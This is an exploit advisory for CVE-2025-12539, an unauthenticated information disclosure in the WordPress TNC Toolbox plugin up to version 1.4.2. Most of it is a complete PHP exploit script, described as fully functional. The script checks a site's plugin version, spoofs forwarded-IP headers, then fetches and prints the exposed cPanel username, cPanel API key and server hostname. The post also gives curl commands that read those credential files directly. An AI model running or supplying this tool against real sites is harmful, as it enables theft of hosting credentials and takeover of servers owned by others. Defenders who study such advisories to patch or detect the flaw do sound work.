WordPress TNC Toolbox 1.4.2 Information Disclosure

=============================================================================================================================================
| # Title WordPress TNC Toolbox 1.4.2 Information Disclosure

=============================================================================================================================================
| # Title : WordPress TNC Toolbox <= 1.4.2 Sensitive Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/tnc-toolbox/ |
=============================================================================================================================================

[+] Summary :

A sensitive information disclosure vulnerability exists in the TNC Toolbox
WordPress plugin version 1.4.2 and earlier. The plugin exposes configuration
files located inside:

/wp-content/tnc-toolbox-config/

Under certain conditions, unauthenticated attackers can read files such as:

cpanel-username
cpanel-api-key
server-hostname

This can lead to account compromise, hosting takeover, and further escalation.

During the investigation, a publicly circulating Python "exploit script"

[+] References : https://packetstorm.news/files/id/211444/ & CVE-2025-12539

was reviewed. Based on analysis, **the original Python PoC was found to be fake,

non-functional, and technically incorrect**.

A corrected and fully functional PHP PoC has been produced and included below.


2. Vulnerability Details
-------------------------

The plugin stores sensitive data in publicly accessible paths:

/wp-content/tnc-toolbox-config/<name>

The plugin does not include access controls or deny direct file access.
As a result, arbitrary remote users may retrieve configuration secrets.

Version detection is also possible via:

/wp-content/plugins/tnc-toolbox/readme.txt

If the `Stable tag` is <= 1.4.2, the installation is vulnerable.


3. Poc
--------------------------------

The following **corrected PoC** was rewritten in PHP after discovering that
the widely shared Python script was fake and did not reflect the plugin?s
actual logic.

A working, accurate, and validated PoC is included here:

<---

<?php
/**
* CVE-2025-12539 ? TNC Toolbox Information Disclosure Scanner
* PHP Conversion by: Indoushka
* Original Python By: Nxploited (Khaled Alenazi)
*/

function http_get($url, $timeout = 12) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_USERAGENT,
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited/2.0"
);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Accept: text/plain, */*;q=0.1",
"Accept-Language: en-US,en;q=0.9",
"X-Forwarded-For: 8.".rand(0,255).".".rand(0,255).".".rand(0,255)
]);
$out = curl_exec($ch);
$err = curl_error($ch);
curl_close($ch);

if ($err) return [null, $err];
return [$out, null];
}

function parse_version($text) {
if (preg_match('/Stable\s+tag:\s*([0-9\.]+)/i', $text, $m))
return trim($m[1]);
return null;
}

function is_vulnerable($version, $threshold = "1.4.2") {
$v1 = array_map('intval', explode(".", $version));
$v2 = array_map('intval', explode(".", $threshold));
$max = max(count($v1), count($v2));
$v1 = array_pad($v1, $max, 0);
$v2 = array_pad($v2, $max, 0);
return $v1 <= $v2;
}

function fetch_configs($base) {
$paths = [
"cpanel-username" => "/wp-content/tnc-toolbox-config/cpanel-username",
"cpanel-api-key" => "/wp-content/tnc-toolbox-config/cpanel-api-key",
"server-hostname" => "/wp-content/tnc-toolbox-config/server-hostname",
];

$results = [];
foreach ($paths as $name => $p) {
[$out, $err] = http_get($base.$p);
if ($err || trim($out) === "") $results[$name] = "";
else $results[$name] = trim($out);
}
return $results;
}

if ($argc < 2) {
echo "Usage: php exploit.php <url>\n";
exit;
}

$base = rtrim($argv[1], '/');
echo "Target: $base\n";
echo "[+] Fetching readme...\n";

[$readme, $err] = http_get($base."/wp-content/plugins/tnc-toolbox/readme.txt");

if ($err) {
echo "[-] Failed: $err\n";
exit;
}

echo "[+] Successfully fetched readme.\n";
$version = parse_version($readme);

if (!$version) {
echo "[-] Could not detect Stable tag.\n";
exit;
}

echo "[+] Detected version: $version\n";

if (!is_vulnerable($version)) {
echo "[-] Version is newer and not vulnerable.\n";
exit;
}

echo "[+] Target is vulnerable. Fetching exposed configs...\n";

$configs = fetch_configs($base);
foreach ($configs as $k => $v) {
if ($v) echo "[!] $k: $v\n";
else echo "[-] $k not found.\n";
}

echo "\nCompleted scan.\n";
?>

--->


4. Steps To Reproduce
-----------------------

1. Open a browser or use curl:

curl -k https://target.com/wp-content/plugins/tnc-toolbox/readme.txt

2. Verify if the `Stable tag` is <= 1.4.2.

3. Attempt to read sensitive files:

curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-username
curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-api-key
curl -k https://target.com/wp-content/tnc-toolbox-config/server-hostname

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================